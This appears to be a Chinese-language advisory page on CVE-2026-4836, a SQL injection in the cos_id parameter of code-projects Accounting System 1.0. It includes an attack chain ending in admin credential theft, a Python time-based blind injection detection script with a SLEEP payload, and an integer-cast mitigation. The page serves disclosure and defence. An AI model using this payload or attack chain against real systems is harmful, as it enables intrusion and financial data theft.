IPBUF安全漏洞报告
English
CVE-2026-4836 CVSS 6.3 中危

CVE-2026-4836 code-projects会计系统SQL注入漏洞

披露日期: 2026-03-26

漏洞信息

漏洞编号
CVE-2026-4836
漏洞类型
SQL注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
code-projects Accounting System

相关标签

SQL注入CVE-2026-4836Accounting SystemWeb安全盲注

漏洞概述

code-projects Accounting System 1.0版本存在严重的SQL注入漏洞。漏洞位于/my_account/delete.php文件中,由于未对用户输入的cos_id参数进行有效过滤,导致攻击者可远程构造恶意SQL语句。攻击者利用此漏洞无需管理员权限即可窃取数据库敏感信息,系统面临数据泄露风险。

技术细节

该漏洞是由于code-projects Accounting System在处理删除账户请求时存在输入验证缺失所导致的。具体而言,在/my_account/delete.php文件中,程序直接获取HTTP请求中的cos_id参数,并将其拼接到SQL查询语句中执行,未使用参数化查询或进行适当的转义。攻击者可以通过发送包含特定SQL语法(如单引号、注释符、布尔逻辑或时间延迟函数)的cos_id值,干扰原始查询逻辑。由于CVSS向量显示权限要求为低(PR:L),攻击者无需高权限即可发起攻击。利用方式通常包括基于时间的盲注或布尔盲注,从而逐位提取数据库中的敏感数据,如用户凭证、财务记录等。

攻击链分析

STEP 1
侦察
攻击者识别目标运行的是code-projects Accounting System 1.0,并定位到/my_account/delete.php接口。
STEP 2
漏洞探测
攻击者向cos_id参数发送特定的SQL注入测试Payload(如AND SLEEP(5)),观察服务器响应时间以判断是否存在注入点。
STEP 3
数据窃取
利用确认的注入漏洞,构造基于时间的盲注语句,逐个字符提取数据库表名、字段名及敏感数据(如管理员密码)。
STEP 4
获取权限
利用获取的管理员凭证登录后台,进一步控制服务器或篡改财务数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 import requests def check_sqli(url): target = f"{url}/my_account/delete.php" # Payload for Time-Based Blind SQL Injection # If the database waits for 5 seconds, it is vulnerable payload = { "cos_id": "1 AND (SELECT SLEEP(5))--" } try: print(f"[+] Sending payload to {target}") response = requests.post(target, data=payload, timeout=10) if response.elapsed.total_seconds() >= 5: print("[!] Vulnerability confirmed: SQL Injection detected (Time-Based).") else: print("[-] Not vulnerable or payload failed.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target_url = "http://192.168.1.100/Accounting-System" # Replace with target URL check_sqli(target_url)

影响范围

code-projects Accounting System 1.0

防御指南

临时缓解措施
建议立即在防火墙层面对/my_account/delete.php接口实施访问控制,仅允许受信任的IP调用。临时修复代码中应将`$_REQUEST['cos_id']`强制转换为整数类型,例如`$cos_id = (int)$_REQUEST['cos_id'];`,以阻断SQL注入语法。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表